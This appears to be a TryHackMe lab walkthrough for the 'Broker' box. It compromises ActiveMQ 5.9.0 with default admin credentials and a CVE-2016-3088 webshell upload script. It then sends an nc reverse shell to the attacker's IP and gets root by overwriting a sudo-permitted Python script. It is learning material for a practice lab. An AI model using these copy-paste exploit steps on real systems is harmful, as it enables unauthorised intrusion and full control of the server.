Broker Tryhackme Walkthrough

BROKER EASY WRITEUP

  BOX DISCRIPTION:-


⭐its Medium Box ,but its not medium box🙂 its too easy Box😏


⭐User falg with Out dated Software CVE exploit


⭐Root flag Misconfiguration

Enumeration:

As usual i'm start with nmap scan 😅

 Nmap 

initial nmap scan , nmap -sV -sC <IP> -A

Result; 

 PORT  STATE SERVICE REASON     VERSION  
 22/tcp open ssh   syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)  
 | ssh-hostkey:   
 |  2048 4c:75:a0:7b:43:87:70:4f:70:16:d2:3c:c4:c5:a4:e9 (RSA)  
 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0E0J6enJ0afxy700qSiIX5MtF1OnZao36BxMDHd4z3X/fbRQc3WOsCzY9KsTw7RltG4bSBJGja3ppRbiLTowv+2aunR3nKPaR/Rea1NFCHPxonnYutUyqPsJIRnm+oV+hqd/rvn/BgLpdNo2bpWG1PG3gNVwmbuUqybL9XF3KoZz8gj6zZPJ+RV8yrM17R2bd1J7YgTMJBKSuKyzVQZJQHJMhdBLBOfVmF3PgajXe2Dm10xbL2rQ3Zsbbuk6hhc4Ypq1LYeZ1PA0aNuHoMzhjXlYQ3XElD5Rzr6rBo5LJr2VD2Y3mo86wyM6OZBb+B88Law3RJ4fwtjVgEoa2KX0F  
 |  256 f4:62:b2:ad:f8:62:a0:91:2f:0a:0e:29:1a:db:70:e4 (ECDSA)  
 | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHyqJ0DAEyEKxeir3lNhPLTZNtDo/CfpLAKWpiSxZUd8NJIrcsNod31Tl+KSwMvNjNvW2ilD1YYxnO2A3FDApqg=  
 |  256 92:d2:87:7b:98:12:45:93:52:03:5e:9e:c7:18:71:d5 (ED25519)  
 |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINqDlHwUjvqNDfhowAQHQMu7A/HVUijCXkxdkgpF/pSe  
 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).  

 

No Port 80 or 8080 

Cool Lets run Full port scan With Nmap 

i reccommad full ports scan tools instead of nmap use Masscan or Rustscan

its Compare to nmap faster than nmap port scan 

Nmap Port Scan 

nmap -p 1000-10000 10.10.110.80 -vv 

because he mentioned in Room

Result

 PORT   STATE SERVICE   REASON  
 1883/tcp open mqtt    syn-ack  
 8161/tcp open patrol-snmp syn-ack  

Sweet... we got  Port 1883 and 8161 


PORT 1883 is mqtt 

PORT 8161 i don't know ok lets enum it :)


PORT 8161

Main page

Yep its mobile screen shot ,iam forgot to take pictures on lap now my lap is dead🚶 so 

wow its http Port !! And its also have Sign in option

lets try Default Username/Passwords 

like admin:password 

admin:admin

ADMIN PAGE


Wow!! we are in Admin Panel


its ActiveMQ website check Admin Page Properly we Got the version info


its ActiveMQ version 5.9.0 

its out Dated Software Also We have Lot of exploits in Github and Metsaploit 

I'd know Metasploit exploit is not worked for me 💔

its pretty easy Box so we use Github exploit

iam using this exploit its perfect ❤️

copy this😁

 git clone https://github.com/gsheller/ActiveMQ_putshell-CVE-2016-3088  

 

STEPS To EXPLOIT THE ActiveMQ 5.9.0

 

 1) cd ActiveMQ_putshell-CVE-2016-3088  
 2) python ActiveMQ_putshell.py -u http://<$IP>:8161  
 OUTPUT:  
  ____            _      _ _   
  | _ \           | |     | || |  
  | |_) | _  _  __ _ ___ | |__  ___ | || |  
  | _ < | | | | / _` |/ __|| '_ \ / _ \| || |  
  | |_) || |_| | | (_| |\__ \| | | || __/| || |  
  |____/ \__, | \__, ||___/|_| |_| \___||_||_|  
      __/ |  __/ |              
      |___/  |___/  
 ActiveMQ_put_path:/opt/apache-activemq-5.9.0/webapps/  
 ActiveMQ_put__txt:http://10.10.110.80:8161/fileserver/guo.txt  
 ActiveMQ_putshell:http://10.10.110.80:8161/admin/guo.jsp  

 

 Our webshell Uploaded Sucessfully 🙂

 

Lets Chect it

Copy my command for Reverse shell 

 First i tried bash revrseshell but its not work😔 

 Hope fully Victim machine have netcat 😌

 command

 http://<$IP>:8161/admin/guo.jsp?pwd=gshell&shell=nc%20<YOUR IP>%209001%20-e%20/bin/sh  

 Be sure Update Your ip's  And listen on local Machine 😜


Baaaang💨!!! Got Reverse connection

USER FLAG

 activemq@activemq:/opt/apache-activemq-5.9.0$ ls     
 ls  
 LICENSE   activemq-all-5.9.0.jar conf   lib       subscribe.py  
 NOTICE       bin                 data   start.sh       tmp  
 README.txt chat.py            flag.txt subcribe.py webapps  
 activemq@activemq:/opt/apache-activemq-5.9.0$ cat flag.txt  
 cat flag.txt  
 THM{youXXXXXXXX}  
 activemq@activemq:/opt/apache-activemq-5.9.0$   

ROOT FLAG

Run Sudo -l to check what permission we run at root🔥

 sudo -l  
 Matching Defaults entries for activemq on activemq:  
   env_reset, mail_badpass,  
   secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin  
 User activemq may run the following commands on activemq:  
   (root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py  

 Cool we run /opt/apache-activemq-5.9.0/subscribe.py in Sudo

 Here is the Payload for Privilleged Escalation

Copy Paste😁

 echo "import os" > subscribe.py  
 echo 'os.system("bash")' >> subscribe.py  
 sudo /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py  

 BOOOM! haha we are ROOT

 

 root@activemq:~# cat root.txt  
 cat root.txt  
 THM{brXXXXXXXX}  
 root@activemq:~#   

 

 

Thats it 

Post a Comment

أحدث أقدم

Smartphones

Post ADS 1

Advertisement

Post ADS 1